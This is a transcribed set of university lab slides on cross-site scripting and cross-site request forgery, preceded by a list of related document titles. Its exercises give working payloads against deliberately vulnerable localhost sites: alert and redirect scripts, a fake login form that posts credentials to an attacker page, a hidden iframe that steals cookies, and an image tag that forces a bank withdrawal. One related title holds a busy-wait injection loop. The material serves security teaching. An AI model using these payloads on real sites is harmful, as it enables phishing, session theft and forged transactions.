XSS & CSRF. Cross-site Scripting & Cross-site request forgery. L. Gasparetto S. Gasperetti D. Pizzolotto

Similar documents
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Web Application Security

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass

Cross Site Scripting in Joomla Acajoom Component

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

Magento Security and Vulnerabilities. Roman Stepanov

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

Criteria for web application security check. Version

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS

Complete Cross-site Scripting Walkthrough

Project 2: Web Security Pitfalls

Data Breaches and Web Servers: The Giant Sucking Sound

Security Research Advisory SugarCRM Cross-Site Scripting Vulnerability

What about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)

Web Application Guidelines

CS 361S - Network Security and Privacy Fall Project #1

Online Vulnerability Scanner Quick Start Guide

1. Building Testing Environment

EECS 398 Project 2: Classic Web Vulnerabilities

Secure Web Development Teaching Modules 1. Threat Assessment

Analysis of Browser Defenses against XSS Attack Vectors

CSRF: Attack and Defense

Security Tools - Hands On

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Bypassing Internet Explorer s XSS Filter

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

An Analysis of the Effectiveness of Black-Box Web Application Scanners in Detection of Stored XSSI Vulnerabilities

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Testing the OWASP Top 10 Security Issues

Advanced Web Security, Lab

Where every interaction matters.

Security Testing with Selenium

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

Attacks on Clients: Dynamic Content & XSS

Intrusion detection for web applications

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Next Generation Clickjacking

The Top Web Application Attacks: Are you vulnerable?

Installation & Configuration Guide Professional Edition

Accessing vlabs using the VMware Horizon View Client for OSX

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

Institutionen för datavetenskap

CS 361S - Network Security and Privacy Spring Project #1

Defending against XSS,CSRF, and Clickjacking David Bishop

FireBLAST Marketing Solution v2

Hacking de aplicaciones Web

Web application security: Testing for vulnerabilities

Essential IT Security Testing


How To Use Mugeda Content

603: Enhancing mobile device experience with NetScaler MobileStream Hands-on Lab Exercise Guide

Avactis PHP Shopping Cart ( Full Disclosure

Sitefinity Security and Best Practices

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

DIPLOMA IN WEBDEVELOPMENT

Tableau Server Trusted Authentication

SQL INJECTION IN MYSQL

Web Same-Origin-Policy Exploration Lab

Expresso Quick Install

Remote Desktop Web Access. Using Remote Desktop Web Access

Preparing for the Cross Site Request Forgery Defense

Reading an sent with Voltage Secur . Using the Voltage Secur Zero Download Messenger (ZDM)

How To Fix A Web Application Security Vulnerability

MWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25 th July Contents

HowTo. Planning table online

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

Secure development and the SDLC. Presented By Jerry

Security features of ZK Framework

Lab 3 Assignment (Web Security)

Ruby on Rails Secure Coding Recommendations

Exploits: XSS, SQLI, Buffer Overflow

Web Application Security

SECURITY ADVISORY. December 2008 Barracuda Load Balancer admin login Cross-site Scripting

Common Security Vulnerabilities in Online Payment Systems

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Free Medical Billing. Insurance Payment Posting: The following instructions will help guide you through Insurance Payment Posting Procedures.

Cross-Site-Scripting (XSS)

Gateway Apps - Security Summary SECURITY SUMMARY

Webapps Vulnerability Report

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Web Application Attacks And WAF Evasion

Hack Proof Your Webapps

5.2.3 Thank you message Bounce settings Step 6: Subscribers 6.1. Creating subscriber lists 6.2. Add subscribers Manual add 6.2.

Recommended Practice Case Study: Cross-Site Scripting. February 2007

Unique promotion code

Portal Recipient Guide

Adobe Systems Incorporated

PHP+MYSQL, EASYPHP INSTALLATION GUIDE

Secure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification

Cross-Site Scripting

Network Security Exercise #8

Understanding Cross Site Scripting

Ethical Hacking Penetrating Web 2.0 Security

Annex B - Content Management System (CMS) Qualifying Procedure

Insight into web application security and why you should care about it

Transcription:

XSS & CSRF Cross-site Scripting & Cross-site request forgery L. Gasparetto S. Gasperetti D. Pizzolotto Department of Computer Science University of Trento Network Security Lab, 2016 L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 1 / 30

Outline 1 Environment setup 2 XSS Reflected Stored 3 CSRF L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 2 / 30

Environment Setup Server Side: (start the VM if not yet running) - Virtual Machine running debian 8: Apache web server to host vulnerable web pages Mysql database to store the website data PHP backend Html, Css, Javascript frontend Client Side: - Firefox browser on the Windows physical machine. L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 3 / 30

XSS Reflected: Background L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 5 / 30

Some html & javascript recap Html tag to insert images: 1 <img src= 'URL ' width= '10 ' height= '10 '/> Html form tag to get user input: 1 <form action= " URL " method= " get "> <!-- or method= " post "--> 2 First name: <input type= " text " name= " fname "/> <br > 3 Last name: <input type= " text " name= " lname "/> <br > 4 <input type= " submit " value= " Submit "/> 5 </form > Html tag to insert Javascript code: 1 <script > alert ('A message '); </script > L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 6 / 30

Flight website Normal behaviour Website to book a flight to any wold capital. http://localhost:8080/flight.php Goal Understand where is the vulnerability and execute malicious code Hint: The user input is also displayed, maybe not sanitized! L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 7 / 30

Flight website 1st exploit Requirement: The user input is not sanitized on the server side. It is possible to insert malicious code. Goal: insert a script that pop-ups the message You have been attacked! Result: L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 8 / 30

Flight website 1st exploit Solution: 1 <script > alert ('You have been attacked!'); </script > Check: Copy the URL in Internet Explorer and verify that the crafted link works. This link can be spammed through e-mail to victims. L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 9 / 30

Flight website 2nd exploit Requirement: The user input is not sanitized on the server side. It is possible to insert malicious code. Goal: insert an image into the page. Set the image path to img/food.jpeg Result: L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 10 / 30

Flight website 2nd exploit Solution: 1 <img src= 'img / food.jpeg ' width= '300 ' height= '300 '> Check: Copy the URL in Internet Explorer and verify that the crafted link works. This link can be spammed through e-mail to victims. L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 11 / 30

Flight website 3rd exploit Requirement: The user input is not sanitized on the server side. It is possible to insert malicious code. Goal: insert a form that asks the user to log in to be able to see the list of the flights. The credentials have to be posted to the attacker server that is located at result.php. The username and password fields must have the two name attributes equal to username and password respectively. Result: L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 12 / 30

Flight website 3rd exploit Solution: 1 In order to see the flight results, you have to log in. 2 <form action= ' result. php ' method= ' post '> 3 Username: <input type= ' username ' name= ' username '/ > 4 <br > 5 Password: <input type= ' password ' name= ' password '/ > 6 <br > 7 <input type= 'submit ' value= 'Log in '/> 8 </form > Check: Copy the URL in Internet Explorer and verify that the crafted link works. This link can be spammed through e-mail to victims. L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 13 / 30

Flight website 3rd exploit Insert credentials into the crafted form. Submit clicking Log in Go to result.php and see that credentials are stolen by the attacker. L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 14 / 30

XSS Stored: Background L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 16 / 30

Html & javascript recap Redirect to another page: 1 <script > window.location.replace (" URL "); </script > Insert an iframe: 1 <iframe src= " URL " width= " 100 " height= " 100 "/> L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 17 / 30

Blog website Normal behaviour Blog website to post reviews (comments) about food. http://localhost:8080/blog.php Goal Understand where is the vulnerability and execute a malicious code Hint: Comments are inserted in the database and then displayed, maybe without checking code presence. L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 18 / 30

Blog website 1st exploit Requirement: The user comment is not sanitized before the insertion into the database. Goal: insert an alert script into a comment that will be loaded by blog s users. Result: L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 19 / 30

Blog website 1st exploit Solution: 1 <script > alert (' You have been attacked '); </ script > Check: Open a different browser and check that if you visit the same page, you are affected by the exploit. L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 20 / 30

Blog website 2nd exploit Requirement: The user comment is not sanitized before the insertion into the database. Goal: insert a comment, that will be loaded by blog s users, which redirects to the page result.php. Result: L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 21 / 30

Blog website 2nd exploit Solution: 1 <script > window.location.replace (" result.php "); </script > Check: Open a different browser and check that if you visit the same page, you are affected by the exploit. Then you can reset the database with the Reset database button. L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 22 / 30

Blog website 3rd exploit Requirement: The user comment is not sanitized before the insertion into the database. Goal: insert a comment, that will be loaded by blog s users, which contains an iframe of the malicious.html page. This page loads a script that steals cookies. Result: L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 23 / 30

Blog website 3rd exploit Solution: 1 <iframe src= " malicious.html " width= "1" height= "1"/> Check: Open a different browser and check that if you visit the same page, you are affected by the exploit. L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 24 / 30

Blog website 3rd exploit Go to result.php and see that user s cookies are stolen by the attacker. L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 25 / 30

CSRF: Background L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 26 / 30

Some html & javascript recap Html tag to insert images: 1 <img src= 'URL ' width= '10 ' height= '10 '/> L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 27 / 30

Blog website Normal behaviour Blog website to post reviews (comments) about food. http://localhost:8080/blog.php L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 28 / 30

Blog website 1st exploit Requirement: The user input is not sanitized on the server side. It is possible to insert malicious code. 1 Attacker: In the blog website insert an image tag setting the src attribute to bank.php?withdraw=1000. No image will be found, but the page will be executed. 2 User: Open a tab, go to bank.php and log in with username= guest and password= guest. 3 User: Refresh blog website page. 4 User: Return to bank.php and see the completed transaction L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 29 / 30

Blog website 1st exploit Solution: 1 <img src= ' bank. php? withdraw=1000 ' width= '1' height= '1'/> L. Gasparetto, S. Gasperetti, D. Pizzolotto XSS & CSRF Network Security Lab, 2016 30 / 30

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information